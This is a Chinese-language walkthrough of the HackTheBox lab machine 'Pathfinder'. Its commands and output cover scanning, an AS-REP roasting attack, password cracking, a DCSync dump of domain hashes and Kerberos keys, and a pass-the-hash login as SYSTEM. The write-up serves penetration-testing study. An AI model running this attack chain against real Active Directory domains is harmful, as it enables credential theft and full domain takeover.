HackTheBox之Pathfinder

端口扫描

直接使用masscan+nmap进行端口扫描

┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ sudo masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-17 08:09:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 47001/tcp on 10.10.10.30                                  
Discovered open port 49664/tcp on 10.10.10.30                                  
Discovered open port 9389/tcp on 10.10.10.30                                   
Discovered open port 49667/tcp on 10.10.10.30                                  
Discovered open port 49671/tcp on 10.10.10.30                                  
Discovered open port 49718/tcp on 10.10.10.30                                  
Discovered open port 49666/tcp on 10.10.10.30                                  
Discovered open port 49677/tcp on 10.10.10.30                                  
Discovered open port 49683/tcp on 10.10.10.30                                  
Discovered open port 135/tcp on 10.10.10.30                                    
Discovered open port 3268/tcp on 10.10.10.30                                   
Discovered open port 88/tcp on 10.10.10.30                                     
Discovered open port 3269/tcp on 10.10.10.30                                   
Discovered open port 53/tcp on 10.10.10.30                                     
Discovered open port 49665/tcp on 10.10.10.30                                  
Discovered open port 5985/tcp on 10.10.10.30                                   
Discovered open port 139/tcp on 10.10.10.30                                    
Discovered open port 445/tcp on 10.10.10.30                                    
Discovered open port 49676/tcp on 10.10.10.30                                  
Discovered open port 636/tcp on 10.10.10.30                                    
Discovered open port 593/tcp on 10.10.10.30                                    
Discovered open port 389/tcp on 10.10.10.30                                    
Discovered open port 49698/tcp on 10.10.10.30                                  
Discovered open port 464/tcp on 10.10.10.30 
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ nmap -sC -sV 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 16:12 CST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 67.60% done; ETC: 16:13 (0:00:05 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.35% done; ETC: 16:13 (0:00:01 remaining)
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 27.27% done; ETC: 16:13 (0:00:16 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 16:13 (0:00:05 remaining)
Nmap scan report for 10.10.10.30
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-17 15:20:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h07m30s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-17T15:21:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.82 seconds

目标开放端口众多,但重点在于开放了ldap、kpasswd5以及kerberos-sec服务,借此可以判断目标为一台活动目录(Active Directory)服务器。
根据Nmap对ldap相关端口的扫描结果可以获得Domain: MEGACORP.LOCAL0.

通过LDAP获取信息

先来介绍下要用到的工具LDAPDomainDump:LDAPDomainDump是一款通过LDAP实现的活动目录信息收集工具。在一个活动目录域中,任何一名认证用户都可以通过LDAP来获取大量有价值的信息。
可知使用该工具需要一名认证用户,由于startpoint系列的主机之间存在关联,刚好在上一个目标中获取到了一份用户名口令:sandra Password1234!,正好用在这里:

┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

输出结果为html格式,domain_users.html输出如下,可以看到存在5个账户,其中Guest,Administrator和krbtgt是默认账户,sandra和svc_bes是用户创建的账户。需要注意的是,svc_bes账户具备DONT_REQ_PREAUTH这一标志位
HackTheBox之Pathfinder
此处涉及到kerberos认证的相关知识,为便于理解在此简要介绍下
HackTheBox之Pathfinder
上图是kerberos的认证流程,若某个用户的flag位为DONT_REQ_PREAUTH,则无需进行第2步与第3步的认证过程,也就意味着可以通过该用户直接请求服务票据(service ticket)

获取服务票据+口令爆破

现在使用impacket工具包中的GetNPUsers.py来获取服务票据,如果没有安装impacket工具包,运行以下命令安装:

sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/

使用GetNPUsers获取svc_bes的服务票据,输出为john可用的格式
HackTheBox之Pathfinder
几个选项涵义如下:

-request   : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass   : Don't ask for password (useful for Kerberos authentication)
-dc-ip     : IP Address of the domain controller.
-format    : Format to save the AS_REQ of users without pre-authentication. Default is hashcat

john爆破结果如下,获取svc_bes口令:Sheffield19

┌──(bob㉿woo)-[~/ldapinfo]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt                    
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 16.51% (ETA: 17:07:35) 0g/s 645043p/s 645043c/s 645043C/s yogismom..yoellia14
Sheffield19      ($krb5asrep$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:15 DONE (2021-07-17 17:07) 0.06459g/s 684981p/s 684981c/s 684981C/s Sherbear94..Shawne116
Use the "--show" option to display all of the cracked passwords reliably
Session completed

WinRM远程登陆

现在我们有了svc_bes的口令,又由于目标开启了5985端口(WinRM服务,WindowsRemoteManagementd,即windows远程管理),因此可使用evil-winrm工具进行远程管理,未安装的话可使用命令:gem install evil-winrm来安装。登陆后,便可获得user级的flag

┌──(bob㉿woo)-[~/ldapinfo]
└─$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30             

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fb166688a8603d970c6d033f637f1

权限提升

使用bloodhound-python工具获取的四个json文件拖拽到bloodhound中,开始分析。可以执行各种分析,但最有用的分析是Shortest Paths to High value Targets (高价值目标最短路径)和Find Principles with DCSync Rights(查找具有DCSync权限的原则)。在Find Principles with DCSync Rights的查询结果显示,svc_bes对域控服务器具有GetChangesAll权限,这意味着该账号能够请求从域控服务器复制数据并获得注入用户哈希之类的敏感信息。此处参考(https://blog.csdn.net/qianxiaoyiran311/article/details/106027299)
使用impacket工具包中的secretsdump.py进行DCSync攻击并转储所有域用户的NTLM哈希值。NTLM凭证由域名、用户名及在最初登录时所输入的加密口令所组成

┌──(bob㉿woo)-[~/Zones]
└─$ secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:70f577ff8a6a3fdc985b9933b0964beb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:63f54baad343b721e1fafb11f02df20e6ad06292cab9db214338f5bc02de094a
PATHFINDER$:aes128-cts-hmac-sha1-96:03e78b35c1feb2be71b7953087333648
PATHFINDER$:des-cbc-md5:61b091839ee9e35d
[*] Cleaning up... 

通过secretsdump成功获取Administrator用户的哈希值,可以进行PTH攻击(哈希传递攻击)以获取系统访问权限。此处使用Impacket工具包的psexec.py进行

┌──(bob㉿woo)-[~/Zones]
└─$ psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18                     
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file yFPortAS.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service fReT on 10.10.10.30.....
[*] Starting service fReT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645

备注

参考链接:
https://shapmanasick.gitbook.io/starting-point-htb/pathfinder-walkthrough
https://blog.csdn.net/qianxiaoyiran311/article/details/106027299

上一篇:随便放点什么东西


下一篇:RocketMQ - body Compress